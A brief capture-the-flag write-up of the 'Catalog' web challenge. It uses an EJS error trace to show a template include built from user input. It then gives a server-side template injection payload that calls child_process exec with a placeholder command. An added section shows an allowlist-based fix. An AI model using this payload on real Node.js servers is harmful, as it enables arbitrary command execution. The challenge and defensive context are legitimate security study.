Tags: ejs ssti
# Catalog (easy) - Web Exploitation
`author : ardhani`
```node
Error: /app/views/cat.ejs:21
19| </div>
20| <div>
>> 21| <%- include('descriptions/' + description) %>
22| </div>
23| </div>
24| </main>
Could not find the include file "descriptions/asd"
at getIncludePath (/app/node_modules/ejs/lib/ejs.js:185:13)
at includeFile (/app/node_modules/ejs/lib/ejs.js:311:19)
at include (/app/node_modules/ejs/lib/ejs.js:701:16)
at eval ("/app/views/cat.ejs":24:17)
at cat (/app/node_modules/ejs/lib/ejs.js:703:17)
at tryHandleCache (/app/node_modules/ejs/lib/ejs.js:274:36)
at exports.renderFile [as engine] (/app/node_modules/ejs/lib/ejs.js:491:10)
at View.render (/app/node_modules/express/lib/view.js:135:8)
at tryRender (/app/node_modules/express/lib/application.js:657:10)
at Function.render (/app/node_modules/express/lib/application.js:609:3)
```
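The error shows that `cat.ejs` builds the include path as `'descriptions/' + description` (here `description` was `asd`), so we can input this payload: `<%= function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('COMMAND_HERE')}() %>`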
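
The fix for the pattern in the error above, as an added example that is not part of the original writeup or the challenge's code: map the untrusted `description` value to an allowlisted partial name before it reaches `include('descriptions/' + description)`. The directory path, the allowlist entries and the name `safeDescription` are assumptions made for illustration.

```javascript
// Added example: validate `description` before it reaches include() in cat.ejs.
const path = require("path");

// Assumed location of the description partials (hypothetical; the page only
// shows /app/views/cat.ejs).
const DESCRIPTIONS_DIR = path.resolve("/app/views/descriptions");

// Constructed allowlist; in a real app, build it once at startup from the
// partials the developers ship, never from user-writable storage.
const KNOWN_DESCRIPTIONS = new Set(["persian", "siamese", "sphynx"]);

const FALLBACK = "unknown";

/**
 * Map an untrusted request value to a partial name that is safe to pass to
 * include('descriptions/' + name). Anything not allowlisted becomes FALLBACK.
 */
function safeDescription(input) {
  // Query parsers can hand back arrays or objects instead of strings.
  if (typeof input !== "string") return FALLBACK;
  // Strict charset: no dots, slashes, NUL bytes, newlines or template tags.
  if (!/^[a-z0-9_-]{1,64}$/.test(input)) return FALLBACK;
  // Only partials that ship with the application may be included.
  if (!KNOWN_DESCRIPTIONS.has(input)) return FALLBACK;
  // Defence in depth: the resolved file must sit directly in DESCRIPTIONS_DIR.
  const resolved = path.resolve(DESCRIPTIONS_DIR, input + ".ejs");
  if (path.dirname(resolved) !== DESCRIPTIONS_DIR) return FALLBACK;
  return input;
}
```

In the route handler, pass `safeDescription(req.query.description)` to `res.render` instead of the raw value, and keep user-supplied content out of any directory EJS can include from.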